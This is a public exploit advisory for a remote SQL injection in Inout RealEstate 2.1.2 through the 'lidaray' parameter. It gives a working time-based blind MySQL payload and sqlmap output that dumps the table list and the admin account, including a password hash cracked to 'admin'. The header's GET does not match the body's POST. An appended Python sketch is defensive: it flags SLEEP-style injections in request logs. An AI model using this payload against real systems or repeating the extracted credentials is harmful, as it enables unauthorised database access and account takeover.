Inout RealEstate 2.1.2 SQL Injection

2022.08.15
Credit: CraCkEr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

C r a C k E r
T H E   C R A C K   O F   E T E R N A L   M I G H T

From The Ashes and Dust Rises An Unimaginable crack....

[ Exploits ]

Author    : CraCkEr
Website   : inoutscripts.com
Vendor    : Inout Scripts
Software  : Inout RealEstate 2.1.2
Vuln Type : Remote SQL Injection
Method    : GET
Impact    : Database Access

Inout RealEstate is an easy, flexible and simple property management solution ideal for business start-ups

B4nks-NET irc.b4nks.tk #unix

Release Notes:
═════════════
Typically used for remotely exploitable vulnerabilities that can lead to system compromise.

Greets: The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL Phr33k , NK, GoldenX, Wehla, Cap, DarkCatSpace, R0ot, KnG, Centerk, chamanwal loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, ix7

CryptoJob (Twitter) twitter.com/CryptozJob

© CraCkEr 2022

POST parameter 'lidaray' is vulnerable.

---
Parameter: lidaray (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: lidaray=20MKTTVT24' AND (SELECT 1823 FROM (SELECT(SLEEP(5)))Caim) AND 'bHOb'='bHOb
---

[INFO] the back-end DBMS is MySQL
[INFO] fetching current database
current database: 'inout_realestate'

fetching tables for database: 'inout_realestate'

Database: inout_realestate
[45 tables]
+--------------------------------+
| adcode                         |
| admin_account                  |
| admin_payment_details          |
| agent_list_request_to_user     |
| broker_citymap                 |
| broker_rate                    |
| broker_review                  |
| brokerabusereport              |
| category_property              |
| chat_details                   |
| chat_messages                  |
| checkout_ipn                   |
| countries                      |
| custom_field                   |
| detail_statistics_list         |
| email_templates                |
| enquiry_status                 |
| forgetpassword                 |
| inout_ipns                     |
| invoicegen                     |
| languages                      |
| list_brokermap                 |
| list_images                    |
| list_main                      |
| listopenhouse                  |
| normal_statistics_list         |
| paymentdetailstat              |
| ppc_currency                   |
| public_side_media_detail       |
| public_slide_images            |
| pupularsiarchlist              |
| recentsearchlist               |
| settings                       |
| sold_listing                   |
| soldlistadd                    |
| traveller_bank_deposit_history |
| user_broker_licenses           |
| user_broker_registration       |
| user_email_verification        |
| user_list_agent_request        |
| user_registration              |
| user_wishlist_mapping          |
| userabusereport                |
| userlistactive                 |
| wish_list                      |
+--------------------------------+

[INFO] fetching columns for table 'admin_account' in database 'inout_realestate'

Database: inout_realestate
Table: admin_account
[6 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| admin_type | tinyint(4)   |
| id         | int(11)      |
| logouttime | int(11)      |
| password   | varchar(255) |
| status     | tinyint(4)   |
| username   | varchar(200) |
+------------+--------------+

[INFO] fetching entries of column(s) 'admin_type,id,password,username' for table 'admin_account' in database 'inout_realestate'

Database: inout_realestate
Table: admin_account
[1 entry]
+----+----------+------------------------------------------+------------+
| id | username | password                                 | admin_type |
+----+----------+------------------------------------------+------------+
| 1  | admin    | 21232f297a57a5a743894a0e4a801fc3 (admin) | 0          |
+----+----------+------------------------------------------+------------+

[-] Done
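
Added example, not part of the original advisory or the vendor's code: a log-triage sketch for the time-based blind pattern shown above. It flags form fields that call a MySQL delay function and uses response latency to separate injections the database executed from ones that were only attempted. The record layout, client addresses, endpoint path and timings are constructed placeholders; only the payload string comes from the page.

```python
import re
from urllib.parse import parse_qsl, urlencode

# SLEEP(n) or BENCHMARK(...) call inside a decoded form value (MySQL delay functions).
DELAY_CALL = re.compile(r"\b(?:sleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)|benchmark\s*\()", re.I)

def suspicious_params(body):
    """Return [(field, requested_delay_or_None)] for form fields calling a delay function."""
    hits = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        m = DELAY_CALL.search(value)
        if m:
            hits.append((name, float(m.group(1)) if m.group(1) else None))
    return hits

def triage(records):
    """records: iterable of (client, path, body, response_seconds) from a request log."""
    findings = []
    for client, path, body, elapsed in records:
        for name, delay in suspicious_params(body):
            # If the response took at least the requested delay, the database most
            # likely evaluated the injected call; otherwise it was only attempted.
            executed = delay is not None and elapsed >= delay
            findings.append({"client": client, "path": path, "param": name,
                             "verdict": "executed" if executed else "attempted"})
    return findings

# Payload string exactly as printed in the advisory's sqlmap output.
PAGE_PAYLOAD = "20MKTTVT24' AND (SELECT 1823 FROM (SELECT(SLEEP(5)))Caim) AND 'bHOb'='bHOb"
# Constructed log records: addresses, path and timings are placeholders, not from the page.
SAMPLE = [
    ("192.0.2.10", "/PLACEHOLDER_ENDPOINT", urlencode({"lidaray": PAGE_PAYLOAD}), 5.21),
    ("192.0.2.10", "/PLACEHOLDER_ENDPOINT", urlencode({"lidaray": PAGE_PAYLOAD}), 0.08),
    ("192.0.2.20", "/PLACEHOLDER_ENDPOINT", "lidaray=20MKTTVT24", 0.05),
    ("192.0.2.30", "/PLACEHOLDER_ENDPOINT", "lidaray=sleeps+4", 0.04),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

An "executed" verdict means the parameter reached the SQL engine as code, so that request path needs the query rewritten with bound parameters; "attempted" still merits review of the source address.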


Copyright 2022, cxsecurity.com

 
